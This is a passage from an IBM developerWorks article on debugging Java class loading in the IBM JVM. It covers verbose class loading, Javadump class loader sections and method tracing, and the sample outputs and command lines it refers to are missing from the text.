ClassToTrace in its main method. This would produce output similar to the output here. The class loaders are listed with parents before children because of the way that the standard delegation model works: Parents go first. Notice that there is no output for the bootstrap class loader. Output is only produced for class loaders that extend java.net.URLClassLoader. Note also that class loaders are listed under their class name; if there are two instances of a class loader, it may not be possible to distinguish between them. Resolving problems using IBM Verbose Class Loading The IBM Verbose Class Loading option is a great way to check what the classpaths for all class loaders have been set to. It also indicates which class loader loads a given class and where it loads it from. This makes it easy to see if the correct version of a class is being loaded. A Javadump (also know as a Javacore) is another IBM diagnosis tool that you may find useful; to learn more about it, see the IBM Diagnostics Guide (see Resources for a link). A Javadump is generated by the JVM when one of the following events occurs: - A fatal native exception occurs - The JVM runs out of heap space - A signal is sent to the JVM (for example, if Control-Break is pressed on Windows, or Control-\ on Linux) - The com.ibm.jvm.Dump.JavaDump()method is called The moment that Javadump is triggered, detailed information is recorded in a date-stamped text file saved in the current working directory. This information includes data about threads, locks, stacks, and so on, as well as a rich set of information about the class loaders in the system. Interpreting the class loading section of a Javadump The exact information that is provided in a Javadump file depends on the platform on which the JVM is running. The class loader section includes: - The defined class loaders and the relationship between them - Lists of classes loaded by each class loader The following is a snapshot of the class loader information taken from a Javadump: In this example, there are only the three standard class loaders: - The system class loader ( sun/misc/Launcher$AppClass loader) - The extension class loader ( sun/misc/Launcher$ExtClass loader) - The bootstrap class loader ( *System*) The Classloader summaries section provides details about each class loader in the system, including the type of the class loader. In this series of articles, the types of interest are the primordial, extension, system, application, and delegation (used in reflection). The other types (shareable, middleware, and trusted) are used in the Persistent Reusable JVM, which is beyond the scope of these articles (see the Persistent Reusable JVM User Guide for more information; there's a link in the Resources section below). The summaries section also shows the parent class loader: The parent of the system class loader is sun/misc/Launcher$ExtClass loader(0x00ADB830). This parent address corresponds to the native data structure of the parent class loader (called the shadow). The ClassLoader loaded classes section lists the classes loaded by each class loader. In this example, the system class loader has only loaded one class, HelloWorld (at address 0x00ACF0E0). Resolving problems using Javadumps Using the information provided in the Javadump, it is possible to ascertain which class loaders exist within the system. This includes any user-defined class loaders. From the lists of loaded classes, it is possible to find out which class loader loaded a particular class. If the class cannot be found, that means that it was not loaded by any of the class loaders present in the system (which would usually result in a ClassNotFoundException). Other types of problems that could be diagnosed using a Javadump include: - Class loader namespace problems. A class loader namespace is a combination of a class loader and all the classes that it has loaded. For example, if a particular class is present but is loaded by the wrong class loader (sometimes resulting in a NoClassDefFoundError), then the namespace is incorrect -- that is, the class is on the wrong classpath. To rectify such problems, try putting the class in a different location -- in the normal Java classpath, for instance -- and make sure that it gets loaded by the system class loader. - Class loader constraint problems. We'll discuss an example of this kind of problem in the final article in this series. The IBM JVM has a built-in method tracing facility. This allows methods in any Java code (including the core system classes) to be traced without modification to the code. Because this facility can provide a large amount of data, you can control the level of trace in order to zero in on the information that you want. The option for enabling trace varies depending on the release of the JVM. For details of these options, refer to the IBM Diagnostics Guides (see Resources for a link). Here are some example command lines: To trace all java.lang.ClassLoader methods when running HelloWorld in IBM Java 1.4.2: To trace the loadClass() method in ClassLoader and the methods in HelloWorld, also in IBM Java 1.4.2: Interpreting method trace output Here is a sample of method trace output (using the second command line from the previous section). Each line of trace provides more information than shown above. Let's look at one of the above lines in full: This tracing includes: 12:57:41.277: The timestamp of method entry or exit. 0x002A23C0: The thread ID. 04000D: An internal JVM trace point used by some advanced diagnostics. - The remaining information shows whether a method is being entered ( >) or exited ( <), followed by details of the method. Resolving problems with method trace Method tracing can be used to resolve different types of problems, including: - Performance hotspots: Using timestamps, it is possible to find methods that take a significant amount of time to execute. - Hangs: The last method entry is usual a good indication of where the application has hung. - Incorrect objects: Using the address, it is possible to check that methods are being invoked on the desired object by matching to the address on the constructor call for that object. - Unexpected code paths: By following the entry and exit points, it is possible to see any unexpected code paths taken by the program. - Other faults: The last method entry is usual a good indication of where the fault has occurred. In this article, you learned the fundamentals of class loading in JVMs and the debugging features available in the IBM JVM. In the next article in this series, you'll learn how to apply this knowledge to understand and resolve various class loading problems typically encountered when running Java_2<<. >>IMAGE.
http://www.ibm.com/developerworks/java/library/j-dclp1/
crawl-003
refinedweb
1,785
59.74
Badly need help: (Unresolved external symbol) & (More than one instance of overloaded function matches argument list)sounds good. you know what they say; if it works, don't touch it ;) counting vowel in a stringhere is another way, a simple function: [code] #include<iostream> #include<cstring> using namespace... C++ counterpart to keyword DATAI did this DATA/READ simulation; [code] #include<iostream> using namespace std; // struct to embe... Looking for free projectsthere are many project sites like sourceforge.net. make a search... I like to work with C/C++ for freeyou can join to SourceForge.net projects for free. Start with one and only one project. During the c... This user does not accept Private Messages
http://www.cplusplus.com/user/muratagenc/
CC-MAIN-2015-32
refinedweb
115
69.18
How to accept payments in React with PayPal. February 15, 2021 How to collect payments with PayPal in your React application I recently built a project that required integrating with Paypal to collect payments from users. After spending hours trying to implement Paypal payments using the Paypal JavaScript SDK, I realized that this was going to be a uphill task. Thankfully, I found an NPM package that already abstracted the SDK into React components for us to use. In this article, I’ll show you exactly how to collect payments using Paypal in your React application. Getting started - setup your Paypal account First steps first. Head over to paypal to create an account. Once done, head to the paypal developer screen. Getting your credentials Next step is to grab your credentials i.e your clientId. Navigate to Dashboard > My Apps & Credentials . Click the Sandbox tab. Then click the on the Default Application link. It will bring you to a page containing your clientId. Your sandbox account will be an email address that you can use to make test payments while your client ID is what Paypal uses to connect your Application to your paypal account. Setup your react project For this example, our React project will be built using NextJS. If you’ll like to follow along, you can skip the next couple of steps by simply cloning my repo. Run the git clone git@github.com:onedebos/nextjs-paypal-example.git command to do so. Then checkout to the starter branch with git checkout starter . If you clone the starter repo, you can skip to the Setup project structure section. Otherwise, here are the steps to follow. We’ll be using one of the NextJS example projects with tailwindcss already configured. Run the command yarn create next-app --example with-tailwindcss next-paypal-example to create a NextJS application with Tailwindcss already configured. Setup Project Structure We’ll create a new folder in our current project called utils. Inside our utils folder, we’ll create a constants folder. Within the constants folder, add an index.js file. Your folder structure should now look like /utils/constants/index.js Install the Paypal package Install the react paypal package using yarn add @paypal/react-paypal-js Collect Payments Time to start collecting Payments! In your utils/constants/index.js file, add your clientId. export const PAYPAL_CLIENT_ID = { clientId: 'ATVzbN_TdDnGGVfyPxu6J-5ddFftdqu8l6tFpIy5TEZ7hjbx7y9Q4TY0ICI0Pot2dBBABc-myxZgYOfj' } In your _app.js file, bring in the PayPalScriptProvider using import { PayPalScriptProvider } from "@paypal/react-paypal-js";. Then, wrap your Components with that tag. import { PayPalScriptProvider } from "@paypal/react-paypal-js"; import {PAYPAL_CLIENT_ID} from '../utils/constants' function MyApp({ Component, pageProps }) { return( <PayPalScriptProvider options= {{"client-id": PAYPAL_CLIENT_ID.clientId }}> <Component {...pageProps} /> </PayPalScriptProvider> ) } export default MyApp Next, head into pages/index.js to create the page that collects the payments and bring in the PayPal Button. Let’s create some state to hold data. const [succeeded, setSucceeded] = useState(false); const [paypalErrorMessage, setPaypalErrorMessage] = useState(""); const [orderID, setOrderID] = useState(false); const [billingDetails, setBillingDetails] = useState(""); The orderId is the most important piece of state we care about. When the user clicks the Pay with PayPal button, Paypal will generate an orderId for the order and return that back to us. In the createOrder function below, we can see this in action. // creates a paypal order const createOrder = (data, actions) => { return actions.order .create({ purchase_units: [ { amount: { // charge users $499 per order value: 499, }, }, ], // remove the applicaiton_context object if you need your users to add a shipping address application_context: { shipping_preference: "NO_SHIPPING", }, }) .then((orderID) => { setOrderID(orderID); return orderID; }); }; Along with the createOrder function, we need another function that runs when the payment is approved - onApprove // handles when a payment is confirmed for paypal const onApprove = (data, actions) => { return actions.order.capture().then(function (details) { const {payer} = details; setBillingDetails(payer); setSucceeded(true); }).catch(err=> setPaypalErrorMessage("Something went wrong.")); }; Lastly, we can plugin out PayPal button from our react-paypal-js package to handle the payments. <PayPalButtons style={{ color: "blue", shape: "pill", label: "pay", tagline: false, layout: "horizontal", }} createOrder={createOrder} onApprove={onApprove} /> Paypal will redirect the user to a new window to complete the payment. You can test this out using the sandbox email provided on the Paypal developer dashboard. The full repo for the code is here.
https://blog.adebola.dev/how-to-accept-payments-in-react-with-paypal/
CC-MAIN-2021-21
refinedweb
706
50.12
Contents Abstract This PEP proposes to change the str() built-in function so that it can return unicode strings. This change would make it easier to write code that works with either string type and would also make some existing code handle unicode strings. The C function PyObject_Str() would remain unchanged and the function PyString_New() would be added instead.. Clearly, a smooth migration path must be provided. We need to upgrade existing libraries, written for str instances, to be made capable of operating in an all-unicode string world. We can't change to an all-unicode world until all essential libraries are made capable for it. Upgrading the libraries in one shot does not seem feasible. A more realistic strategy is to individually make the libraries capable of operating on unicode strings while preserving their current all-str environment behaviour. First, we need to be able to write code that can accept unicode instances without attempting to coerce them to str instances. Let us label such code as Unicode-safe. Unicode-safe libraries can be used in an all-unicode world. Second, we need to be able to write code that, when provided only str instances, will not create unicode results. Let us label such code as str-stable. Libraries that are str-stable can be used by libraries and applications that are not yet Unicode-safe. Sometimes it is simple to write code that is both str-stable and Unicode-safe. For example, the following function just works: def appendx(s): return s + 'x' That's not too surprising since the unicode type is designed to make the task easier. The principle is that when str and unicode instances meet, the result is a unicode instance. One notable difficulty arises when code requires a string representation of an object; an operation traditionally accomplished by using the str() built-in function. Using the current str() function makes the code not Unicode-safe. Replacing a str() call with a unicode() call makes the code not str-stable. Changing str() so that it could return unicode instances would solve this problem. As a further benefit, some code that is currently not Unicode-safe because it uses str() would become Unicode-safe. Specification A Python implementation of the str() built-in follows: def str(s): """Return a nice string representation of the object. The return value is a str or unicode instance. """ if type(s) is str or type(s) is unicode: return s r = s.__str__() if not isinstance(r, (str, unicode)): raise TypeError('__str__ returned non-string') return r The following function would be added to the C API and would be the equivalent to the str() built-in (ideally it be called PyObject_Str, but changing that function could cause a massive number of compatibility problems): PyObject *PyString_New(PyObject *); A reference implementation is available on Sourceforge [1] as a patch. Backwards Compatibility Some code may require that str() returns a str instance. In the standard library, only one such case has been found so far. The function email.header_decode() requires a str instance and the email.Header.decode_header() function tries to ensure this by calling str() on its argument. The code was fixed by changing the line "header = str(header)" to: if isinstance(header, unicode): header = header.encode('ascii') Whether this is truly a bug is questionable since decode_header() really operates on byte strings, not character strings. Code that passes it a unicode instance could itself be considered buggy. Alternative Solutions A new built-in function could be added instead of changing str(). Doing so would introduce virtually no backwards compatibility problems. However, since the compatibility problems are expected to rare, changing str() seems preferable to adding a new built-in. The basestring type could be changed to have the proposed behaviour, rather than changing str(). However, that would be confusing behaviour for an abstract base type.
http://docs.activestate.com/activepython/3.6/peps/pep-0349.html
CC-MAIN-2018-09
refinedweb
647
55.64
Keter 205/65R15 Cheap Wholesale New Car Tires Made in China US $15-100 / Piece 100 Pieces (Min. Order) Top Sponsored Listing China car tyres 175/70r13 and 185/65r14 of HILO brand for sale US $13.94-14.08 / Piece | Buy Now 600 Pieces (Min. Order) Car tires 175/65R14 buy tires direct from china US $13-15 / Piece 1 Piece (Min. Order) 165 50r14 175 65r14 185 60r14 car tyre US $12-40 / Piece 1 Piece (Min. Order) PCR tyre ,car tyre dealer,car tyre manufacturer US $1-180 / Piece 1 Piece (Min. Order) 145/70R13,145/80R13,155/70R13,165/65R13 new car tires r13 US $15.5-18.5 / Piece 500 Pieces (Min. Order) SPORTCROSS EU Labeling SUV car tyres 305/40R22 114VXL US $30-50 / Piece 1 Piece (Min. Order) wholesale used car tires/tyres sale on alibaba china used car tires from japan and Germany US $6-8 / Piece 500 Pieces (Min. Order) China Tire Pruducer High Quality Best Prices Chinese PCR Passenger Car Tyre US $10-50 / Piece 1 Piece (Min. Order) full rang good price pcr car tire US $10-20 / Set 1 Set (Min. Order) made in china car tires 235/35ZR20 cheap new tires bulk wholesale US $32.0-33.0 / Forty-Foot Container | Buy Now 1 Forty-Foot Container (Min. Order) Four Wheel 20*10.00-8 Golf car tire US $15-25 / Piece 300 Pieces (Min. Order) 2016 eco-friendly High quality model toy car tyre, Car tyres with high performance, competitive pricing US $0.1-0.3 / Piece 500 Pieces (Min. Order) Cheap price 195/60R15 car tire thailand US $14.86-17.98 / Piece 1 Forty-Foot Container (Min. Order) Wholesale Cheap Tyre Made in China Car Tyre 195 55R 15 US $29-50 / Set 10 Sets (Min. Order) Cheap passenger car tyres 235 55 17 wholesale made in china car tyres US $20-100 / Piece 500 Pieces (Min. Order) Goodyear Car Tyres Quality 215/60R16 US $19.9-39.9 / Pair 1 Pair (Min. Order) Tungsten carbide nailing winter car tire with studs 9-11 US $0.025-0.2 / Piece 100000 Pieces (Min. Order) Wholesale PCR Cheap Car Tyre 205/65R15 from China KINGRUN &BESTRICH Brand TIRES US $10-20 / Piece 1 Piece (Min. Order) ECE,DOT,GCC,ISO ,M+S ,REACH,CAMRUN BRAND CAR TIRES tire 175 65 14 US $1-25 / Piece 1 Forty-Foot Container (Min. Order) tires 195/65/r15 205/65r15 cheap car tires US $15-50 / Piece 1 Piece (Min. Order) China Supplier Low Price Cheap Linglong Car Tyres 195/65r15 265/70r16 265/65r17 US $20-100 / Piece 10 Pieces (Min. Order) Good Car tyre size 185/65R14 US $19.50-40 / Piece 600 Pieces (Min. Order) wholesale used car tires 13-18 inch sale on alibaba china from japan and Germany US $6.0-7.2 / Pieces 600 Pieces (Min. Order) Professional custom product soft silicone rubber toy car tires Dongguan factory US $1.42-1.5 / Piece | Buy Now 2000 Pieces (Min. Order) 205/55/16 car tire US $16-30 / Piece 1 Piece (Min. Order) used passenger car tyre 13- 21 inch US $6-8.5 / Piece 100 Pieces (Min. Order) famous brand china passenger car tyres 255/70R15,275/55R17,235/55R18,245/35R20 US $26-70 / Piece 1 Piece (Min. Order) Chinese cheap car tire 225/60/16 US $10-20 / Piece 1 Piece (Min. Order) import not used chinese professional passenger car tire 215/55ZR16 US $24.5-25.0 / Piece | Buy Now 500 Pieces (Min. Order) Durun Brand Car Tires 225/45R17 Ultra High Performance tyres UHP Tires US $15-40 / Piece 1 Piece (Min. Order) Made in China PCR tire,chinese passenger car tires price of tire car US $10-50 / Piece 600 Pieces (Min. Order) car tire 215/75r16c with competitive price US $10-50 / Piece 1 Piece (Min. Order) new tires for cars tire factory 265/35r18 245/50R18 ; 255/55R18 US $39.5-41 / Piece 1 Piece (Min. Order) 165/70R14 175/70R14 185/70R14 195/70R14 205/70R14 CAR TIRE US $10-20 / Piece 1 Piece (Min. Order) 215/55R16 TYRE, CAR TYRE, CHINA BRAND TYRE US $50-52 / Piece 1 Forty-Foot Container (Min. Order) 175/70R13(TR928)82T Triangle Brand Radial Passenger Car Tires 1 Twenty-Foot Container (Min. Order) Buying Request Hub Haven't found the right supplier yet ? Let matching verified suppliers find you. Get Quotation NowFREE Do you want to show car tire or other products of your own company? Display your Products FREE now! Related Category Product Features Supplier Features Supplier Types Recommendation for you related suppliers related Guide related from other country
http://www.alibaba.com/countrysearch/CN/car-tire.html
CC-MAIN-2017-17
refinedweb
784
84.98
A quick thing about setting up test projects through Visual Studios… basically how to do so. Add new Project -> Test (Project Types) -> Test Project. Now the easiest way I’ve added actual tests is just to add a normal class. Say SomeClassTest. using Microsoft.VisualStudio.TestTools.UnitTesting; [TestClass] public class SomeClassTest() { [TestMethod] public void SomeClass_CreateWithNull() { } } What is [TestClass]? Well that is an attribute you are adding to the class so that .net knows certain methods in it may be test methods. Guess what [TestMethod] does… Ok so now I have a TestClass and TestMethod, now what? Well in the menu: Test -> Windows -> TestView You should see that your method now shows up on the list. Simple huh? If the method isn’t showing up on the list make sure it is: - Tagged with the [TestMethod] attribute - Contained in a PUBLIC [TestClass] - Public - void - Non static If you have all of those and still nothing, right click the method name in the Test View and look at it’s properties. There is a property called “Non-Runnable Error”. This will tell you what you need to get it rolling. All right, now you have everything set… so next? Simple, right click the method name in the Test View and you can either Run or Debug the test. If you just Run the test, the Test Results window will pop up and you’ll see the progress. If it passes, then yay. If not, it will give you things unhandled/expected exception, failed asserts, and expected exceptions. If you debug, the same happens except, CRAZY SURPRISE AHEAD!!!, you can step through it. Also, you can run multiple tests by selecting however many you want and running them. There are some useful options in the test view. If you right click the column area, you can add columns such as Class Name to help with ordering. After all, you might have a bunch of methods that are named the same in different classes, which sucks. Another thing you can do is left click the down arrow to the right of the refresh button for group by options. End Note: If you don’t recognize the word “attribute” that’s ok. Most likely you have seen the [Something] notation before if you have used web controls (Possibly winforms controls, no idea). Simply put, attributes are like attaching extra information to just about anything so that later on you can use that information at runtime to perform actions. With the use of reflection, you could, for instance, check for only specific properties on a class that you want to fill dynamically. Say you have a dataset with the “UserName” column and a User class with the property Name. If you wanted to fill that Name property normally you could do something like: user.Name = dataset["UserName"]; but with relfection you could get the property info, check the properties for a the ones with a certain attribute, and match the value in the attribute to the column name.
http://byatool.com/2008/06/
CC-MAIN-2019-13
refinedweb
502
71.85
My assaigment was: Suppose we are working for an online service that provides a bulletin board for its users. We would like to give our users the option of filtering out profanity. Suppose we consider the words cat, dog and llama to be profane. Write a program that reads a string from the keyboard and tests whether the string contains one or more of our profane words. Your program should find words like cAt that differ only in case. Your program should display the read string with the profanities replaced with the character '*'. Your program should modify lines that contain profanities only, not lines that contain words like, dogmatic or concatenate or category. This is what I have so far, import java.util.Scanner; public class SomeClass { public static void main(String [] args){ String name; int case_num = 0; Scanner keyboard = new Scanner(System.in); System.out.println("Enter sentences"); name = keyboard.next(); name.equalsIgnoreCase(name); if (name.contains("cat "))//(name.indexOf("cat") !=-1) //testing if the "" (Space) will read 'cat' only and not 'cattt' { case_num = 1; } else if (name.indexOf("dog") !=-1) { case_num = 1; } else if (name.indexOf("llama") != -1) { //System.out.println("Profanity found"); case_num = 1; } switch(case_num) { case 1: System.out.println("Profanity found"); break; default: System.out.println("no found"); } } } The problem is that it's not doing what the assaigment is asking for =( If i type 'cat' it says (no found) and I believe it should say (profainy found) I think I'm missing something, but I don't know what is it.
https://www.daniweb.com/programming/software-development/threads/463744/using-replace-or-contains
CC-MAIN-2017-09
refinedweb
257
65.62
Building a Realtime Chat App With Django and Fanout Cloud In this tutorial, we show you how to create a web-based, communication application using these two free platforms. Read on for more! Join the DZone community and get the full member experience.Join For Free chat is one of the most popular uses of realtime data. in this article we'll explain how to build a web chat app in django, using django eventstream and fanout cloud . the django eventstream module makes it easy to push json events through fanout cloud to connected clients. introduction to django and realtime django was created in 2003 when websites were orders of magnitude simpler than they are now. it was built on a request-response framework - the client sends an http request, django receives it, processes it, and returns a response back to the client. this framework wasn't designed for the expectations of the modern web, where it's common for an app to rely on data moving quickly between many microservices or endpoints. request-response doesn't support the persistent, open connection required to send data between endpoints at any time and provide a realtime user experience. fanout cloud fanout cloud gives web services realtime superpowers. server apps running behind fanout cloud can easily and scalably support realtime push mechanisms such as http streaming and websockets. for the chat app in this article, we'll be using django eventstream, a convenience module for django that integrates with fanout cloud. django eventstream makes it easy to push data to clients, using very little code. what about django channels? django channels makes it possible for django applications to natively handle persistent, open connections for sending realtime updates. we don't use django channels in this chat example, mainly because connection management is being delegated to fanout cloud . having this capability in the backend django app is simply not needed in this example. comparing django channels to fanout cloud is mostly an apples-to-oranges comparison, though. django channels primarily provides asynchronous network programming patterns, bringing django up to speed with other modern environments like node.js and go. fanout cloud, on the other hand, is a connection delegation architecture, which is useful for separation of concerns and high scalability. the benefits of fanout cloud are orthogonal to whether or not the backend environment supports asynchronous programming. the chat app what's required for a basic chat app? we'll need: - a way to load past chat messages when the app is loaded. - a way to save a chat message on the server. - a way for new chat messages to be pushed out to clients. - a way to dynamically manipulate ui elements to display received messages. when the requirements are broken down like this, you'll notice that most of these things aren't necessarily specific to the problem of "realtime." for example, saving a chat message on the server and loading past messages when the app is opened is pretty conventional stuff. in fact, we recommend developers start out by building these conventional parts of any new application before worrying about realtime updates. below we'll walk through these parts for the chat app. first, we need to declare some models in models.py : from django.db import models class chatroom(models.model): eid = models.charfield(max_length=64, unique=true) class chatmessage(models.model): room = models.foreignkey(chatroom) user = models.charfield(max_length=64) date = models.datetimefield(auto_now=true, db_index=true) text = models.textfield() def to_data(self): out = {} out['id'] = self.id out['from'] = self.user out['date'] = self.date.isoformat() out['text'] = self.text return out each message object has an associated room object, username, timestamp, and the actual message text. for simplicity, we don't use real user objects. in a more sophisticated app, you'd probably want to include a foreign key to a user object. the to_data method converts the message into a plain dictionary, useful for json encoding. the room object has a field eid for storing an external facing id, so rooms can be referenced using user-supplied ids/names rather than database row id. in urls.py we declare some endpoints: from django.conf.urls import url from . import views urlpatterns = [ url(r'^$', views.home), url(r'^(?p<room_id>[^/]+)$', views.home), url(r'^rooms/(?p<room_id>[^/]+)/messages/$', views.messages), ] and in views.py we implement them: import json from django.http import httpresponse, httpresponsenotallowed from django.db import integrityerror from django.shortcuts import render, redirect from .models import chatroom, chatmessage def home(request, room_id=none): user = request.get.get('user') if user: if not room_id: return redirect('/default?' + request.get.urlencode())['messages'] = msgs context['user'] = user return render(request, 'chat/chat.html', context) else: context = {} context['room_id'] = room_id or 'default' return render(request, 'chat/join.html', context) def messages(request, room_id): if request.method == 'post': try: room = chatroom.objects.get(eid=room_id) except chatroom.doesnotexist: try: room = chatroom(eid=room_id) room.save() except integrityerror: # someone else made the room. no problem room = chatroom.objects.get(eid=room_id) mfrom = request.post['from'] text = request.post['text'] msg = chatmessage(room=room, user=mfrom, text=text) msg.save() body = json.dumps(msg.to_data()) return httpresponse(body, content_type='application/json') else: return httpresponsenotallowed(['post']) the view loads either the join.html or chat.html template depending on whether a username was supplied. the messages view receives new messages submitted using requests, and the messages are saved in the database. the chat.html template is the main chat app. it prepopulates a div containing past chat messages: <div id="chat-log"> {% for msg in messages %} <b>{{ msg.from }}</b>: {{ msg.text }}<br /> {% endfor %} </div> and we use jquery to handle posting new messages: $('#send-form').submit(function () { var text = $('#chat-input').val(); $.post('/rooms/{{ room_id }}/messages/', { from: nick, text: text } ).done(function (data) { console.log('send response: ' + json.stringify(data)); }).fail(function () { alert('failed to send message'); }); return false; }); this is enough to satisfy the basic, non-realtime needs of the app. the app can be loaded, chat messages can be submitted to the server and saved, and if the app is refreshed it will show the latest messages. we haven't done anything fanout-specific yet; this is just normal django and jquery code. now for the fun part! first, we install the django eventstream module: pip install django-eventstream then we make some changes to settings.py : installed_apps = [ ... 'django_eventstream', # <--- add module as an app ] middleware = [ 'django_grip.gripmiddleware', # <--- add middleware as first entry ... ] # --- add fanout cloud configuration --- from base64 import b64decode grip_proxies = [{ 'control_uri': '{realm-id}', 'control_iss': '{realm-id}', 'key': b64decode('{realm-key}') }] (in your own code, be sure to replace {realm-id} and {realm-key} with the values from the fanout control panel.) then we add an /events/ endpoint in urls.py : from django.conf.urls import include, url import django_eventstream urlpatterns = [ ... url(r'^events/', include(django_eventstream.urls)), ] alright, the django eventstream module has been integrated. now to actually send and receive events. on the server side, we'll update the handler to send an event when a chat message is added to the database: from django.db import transaction from django_eventstream import send_event ... mfrom = request.post['from'] text = request.post['text'] with transaction.atomic(): msg = chatmessage(room=room, user=mfrom, text=text) msg.save() send_event('room-%s' % room_id, 'message', msg.to_data()) body = json.dumps(msg.to_data()) return httpresponse(body, content_type='application/json') notice that we use a transaction. this way the message won't be accepted unless an event was also logged. we'll also provide the most recent event id to the template: from django_eventstream import get_current_event_id ... last_id = get_current_event_id(['room-%s' % room_id])['last_id'] = last_id context['messages'] = msgs context['user'] = user return render(request, 'chat/chat.html', context) when the frontend sets up a listening stream, it can indicate the event id it should start reading after. it's important that we retrieve the current event id before retrieving the past chat messages so that there's no chance the client misses any messages sent while the page is loading. now we can update the frontend to listen for updates and display them. first, include the client libraries: <script src="{% static 'django_eventstream/json2.js' %}"></script> <script src="{% static 'django_eventstream/eventsource.min.js' %}"></script> <script src="{% static 'django_eventstream/reconnecting-eventsource.js' %}"></script> then set up a reconnectingeventsource object to listen for updates: var uri = '/events/?channel=room-' + encodeuricomponent('{{ room_id }}'); var es = new reconnectingeventsource(uri, { lasteventid: '{{ last_id }}' }); var firstconnect = true; es.onopen = function () { if(!firstconnect) { appendlog('*** connected'); } firstconnect = false; }; es.onerror = function () { appendlog('*** connection lost, reconnecting...'); }; es.addeventlistener('stream-reset', function () { appendlog('*** client too far behind, please refresh'); }, false); es.addeventlistener('stream-error', function (e) { // hard stop es.close(); e = json.parse(e.data); appendlog('*** stream error: ' + e.condition + ': ' + e.text); }, false); es.addeventlistener('message', function (e) { console.log('event: ' + e.data); msg = json.parse(e.data); appendlog('<b>' + msg.from + '</b>: ' + msg.text); }, false); a number of callbacks are set up here. the essential ones are the event listeners for and stream-error . the event emits whenever a new chat message is received. the stream-error event emits when the server responds with an unrecoverable error. it's important to handle this event by stopping the client object, otherwise, the client will reconnect and likely get the same error again. the onopen and onerror callbacks, as well as the event listener for stream-reset , are purely informative, useful to let the user know whether they are connected or not, and/or whether the client has been disconnected for too long. you could program the client to automatically reload itself if stream-reset is received rather than displaying a message to the user. one other thing: there is a race condition we need to work around, in case a chat message is received twice (once as part of the page, and again as a received event). to solve this, we check incoming message ids against the ids of the initial messages provided during page load. we put the initial message ids in an array: var msg_ids = [ {% for msg in messages %} {% if not forloop.first %},{% endif %}{{ msg.id }} {% endfor %} ]; then in our message handler, we check against the array: es.addeventlistener('message', function (e) { console.log('event: ' + e.data); msg = json.parse(e.data); // if an event arrives that was already in the initial pageload, // ignore it if($.inarray(msg.id, msg_ids) != -1) { return; } appendlog('<b>' + msg.from + '</b>: ' + msg.text); }, false); that's it! the full source for the chat app is here . justin karneges is the founder of fanout . this post originally appeared on the fanout blog . Published at DZone with permission of Justin Karneges, DZone MVB. See the original article here. Opinions expressed by DZone contributors are their own.
https://dzone.com/articles/building-a-realtime-chat-app-with-django-and-fanou?utm_medium=feed&utm_source=feedpress.me&utm_campaign=Feed%3A+dzone%2Fwebdev
CC-MAIN-2021-43
refinedweb
1,790
52.76
From: Jason Beech-Brandt (jason_at_ahpcrc_dot_org) Date: Tue Jul 18 2006 - 15:06:20 PDT Paul, Made these changes and did a clean build. Wouldn't build the udp-conduit, so I disabled it and it completed the build with the smp/mpi/gm conduits. Tested it with the gm-conduit with a simple hello.upc program and it does the correct thing. I haven't tried to build/run any of our application code with it yet. Thanks for the help. Jason Paul H. Hargrove wrote: > Jason, > > PGI versions prior to 6.1 lacked the required inline asm support. So, > you have a new enough version of the PGI compiler. However, the > corresponding support in bupc is not in the released 2.2.2. The > atomics support has undergone a significant re-write since the 2.2.x > series, and thus there is no simple patch to bring a 2.2.2 version up > to the current atomic support. However, the following 2-line change > *might* work: > > --- gasnet_atomicops.h 7 Mar 2006 23:36:46 -0000 1.76.2.5 > +++ gasnet_atomicops.h 17 Jul 2006 20:41:30 -0000 > @@ -53,7 +53,6 @@ > #if defined(GASNETI_FORCE_GENERIC_ATOMICOPS) || /* for debugging */ > \ > defined(CRAYT3E) || /* T3E seems to have no atomic ops */ \ > defined(_SX) || /* NEC SX-6 atomics not available to user > code? */ \ > - (defined(__PGI) && defined(BROKEN_LINUX_ASM_ATOMIC_H)) || /* > haven't implemented atomics for PGI */ \ > defined(__SUNPRO_C) || defined(__SUNPRO_CC) /* haven't > implemented atomics for SunCC */ > #define GASNETI_USE_GENERIC_ATOMICOPS > #endif > @@ -272,7 +271,7 @@ > * support for inline assembly code > * > ------------------------------------------------------------------------------------ > */ > #elif defined(__i386__) || defined(__x86_64__) /* x86 and > Athlon/Opteron */ > - #if defined(__GNUC__) || defined(__INTEL_COMPILER) || > defined(__PATHCC__) > + #if defined(__GNUC__) || defined(__INTEL_COMPILER) || > defined(__PATHCC__) || defined(__PGI) > #ifdef GASNETI_UNI_BUILD > #define GASNETI_LOCK "" > #else > > > However, it is entirely possible that this will trigger PGI bugs that > we work around in various ways in our development head. > > -Paul > > Jason Beech-Brandt wrote: >> > >
http://www.nersc.gov/hypermail/upc-users/0193.html
crawl-001
refinedweb
307
57.98
from __future__ import error A little birdie tells me that we're going to have to abort this round because the fauxton source was not included in the dist tarball. Jan is working on this now. The reason this wasn't picked up by build_candidate.sh is that we added an exception for it for the last release. I have fixed that now:;a=commitdiff;h=06b22b467db989782edf0e70d3ef77b90d9b41e9 Over to Jan. On 9 October 2013 16:46, Dirkjan Ochtman <dirkjan@ochtman.nl> wrote: > On Wed, Oct 9, 2013 at 4:36 PM, Matt Goodall <matt.goodall@gmail.com> > wrote: > > One small point: Dirkjan's gpg public key isn't one of the listed > > --recv-keys in the Test_procedure wiki page. > > Good point, updated the wiki page with my new key ID. > > Cheers, > > Dirkjan > -- Noah Slater
http://mail-archives.apache.org/mod_mbox/couchdb-dev/201310.mbox/%3CCAPaJBx4vEM+F2mpS0wTB_iyYcODNmN7ceBkHGtH-VLCawiOewQ@mail.gmail.com%3E
CC-MAIN-2018-30
refinedweb
134
76.52
Bean value not getting updated Marissah Miller Greenhorn Joined: Apr 28, 2013 Posts: 5 posted Apr 28, 2013 18:56:47 0 Hi, I'm new to JSF so please forgive my lack of knowledge! I have been stuck on the same issue for a few weeks and have gotten so frustrated with it that I just can't seem to figure it out. I've tried searching, tried looking at examples, but what I'm doing is a tad odd and I can't seem to figure out what's wrong. Long story short, I have a tree whose children are "pages" and the pages each have "questions" as children. I am making something a bit similar to SurveyMonkey or FluidSurveys so the main content pane will have options for configuring a question (text, multiple choice, numeric, etc). When you click the tree nodes for the "questions" I want it to save the values (in the database or session, doesn't matter, I haven't gotten that far yet) the user has selected and then load the previously saved configuration for the question node they have just clicked. So the event that will trigger the need for reading the values the user has input is my OnNodeSelect. However, when I check the "question" values, they are still the same as they were initialized to. The bean is session scoped and is working for the tree aspects (I can add and remove nodes) but I can never get the values for the question. I have a feeling that I'm making a really obvious mistake, but I just can't figure it out. Also, I apologize in advance for my code if it's not very good. The way I'm testing (as a preliminary step before coding to do something useful) is when I select a node, I attempt to print out what the question text is. It's always null even though I have typed in the text area. I also have a println in the set method for questionText but that never gets printed out. Here is the xhtml: <f:view 